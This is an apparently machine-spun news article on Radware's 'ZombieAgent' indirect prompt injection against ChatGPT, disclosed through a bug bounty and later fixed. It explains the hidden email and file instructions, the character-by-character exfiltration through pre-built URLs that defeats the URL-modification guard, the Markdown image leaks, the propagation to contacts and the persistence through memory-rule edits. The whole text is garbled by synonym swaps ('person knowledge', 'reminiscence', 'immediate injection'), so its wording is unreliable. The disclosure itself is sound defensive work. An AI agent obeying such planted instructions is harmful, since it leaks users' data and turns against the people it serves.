ChatGPT vulnerabilities may very well be exploited to exfiltrate person knowledge and modify the agent’s long-term reminiscence for persistence, internet safety agency Radware reviews.
Extensively adopted throughout enterprises worldwide, ChatGPT has broad entry to inside functions, similar to Gmail, GitHub, Jira, and Groups, and by default shops person conversations and delicate info.
It additionally consists of built-in performance to browse the net, analyze information, and extra, making it handy and highly effective, but additionally increasing the dangers related to its malicious use.
On Thursday, Radware disclosed a brand new oblique immediate injection approach that exploits ChatGPT vulnerabilities to exfiltrate person knowledge and switch the AI agent right into a persistent spy device for attackers.
Known as ZombieAgent, the assault depends on malicious emails and information to bypass OpenAI’s protections and exfiltrate knowledge from the sufferer’s inbox and e mail handle e book, with out person interplay.
Within the first situation detailed by Radware, the attacker exfiltrates delicate person knowledge through OpenAI’s personal servers by sending an e mail containing malicious directions for ChatGPT.Commercial. Scroll to proceed studying.
When the person asks the AI agent to carry out a Gmail motion, it reads the directions within the attacker’s e mail and exfiltrates the info “earlier than the person ever sees the content material”, Radware says.
The e-mail accommodates a listing of pre-constructed URLs for every letter and digit, and a particular token for areas, and instructs ChatGPT to seek for delicate info, normalize it, and exfiltrate it character by character utilizing the supplied URLs.
ChatGPT can not modify supplied URLs to forestall the leakage of knowledge by appending it as parameters to an attacker-provided hyperlink, however Radware’s assault makes the safety ineffective because the agent doesn’t modify the pre-provided URLs.
For the assault to efficiently exfiltrate delicate info, “no person motion is required past regular dialog with ChatGPT,” the safety agency explains.
Radware’s second assault situation depends on malicious directions contained in a file that the person shares with ChatGPT. Based mostly on these directions, the agent exfiltrates knowledge, each through OpenAI’s servers and through Markdown picture rendering.
Propagation and persistence
The third assault situation offered by the safety agency is like the primary however targets the latest e mail addresses within the sufferer’s inbox. After receiving the addresses, the attacker sends the malicious payload to them, propagating the assault.
Within the fourth assault situation, the attacker establishes persistence by sending a malicious file containing directions to switch the agent’s long-term reminiscence with attacker-created guidelines.
When the person shares the file with ChatGPT, the agent reads the directions and units the memory-modification guidelines.
Based mostly on these guidelines, ChatGPT reads an attacker e mail and executes the directions it accommodates each time the person sends a message, and saves to reminiscence delicate info each time the person shares it.
Usually, when utilizing the Connectors function (which provides it entry to enterprise functions), ChatGPT can not use the Reminiscence function (the place it saves customers’ delicate info) in the identical chat.
Nevertheless, the attacker’s memory-modification guidelines outcome within the agent all the time studying Reminiscence first, executing the attacker’s malicious directions, and solely then responding to the person.
In response to Radware, this persistence mechanism may be abused for knowledge manipulation or for performing extra dangerous actions.
Moreover, the safety agency says, the assaults might goal not solely e mail, however some other enterprise utility linked to ChatGPT, both for knowledge harvesting or for delivering malicious directions to the agent.
“In apply, any useful resource that ChatGPT can learn through Connectors (emails, paperwork, tickets, repositories, shared folders, and so forth.) can doubtlessly be abused to host attacker-controlled directions that may later be executed by ChatGPT,” Radware notes.
An attacker might disguise the malicious directions within the content material of any e mail or file, both by making the textual content white or by together with them in a doc’s disclaimers or footers, that are sometimes ignored by customers.
“From the person’s perspective, the e-mail or doc seems benign and readable. From ChatGPT’s perspective, nonetheless, the total hidden immediate is seen in plain textual content and shall be processed similar to some other instruction,” the safety agency says.
Radware reported the problems to OpenAI through BugCrowd in September. A repair was launched on December 16.
Associated: ChatGPT Focused in Server-Aspect Information Theft Assault
Associated: In Different Information: PromptPwnd Assault, macOS Bounty Complaints, Chinese language Hackers Educated in Cisco Academy
Associated: Google Fortifies Chrome Agentic AI In opposition to Oblique Immediate Injection Assaults
Associated: ‘Whisper Leak’ LLM Aspect-Channel Assault Infers Consumer Immediate Matters
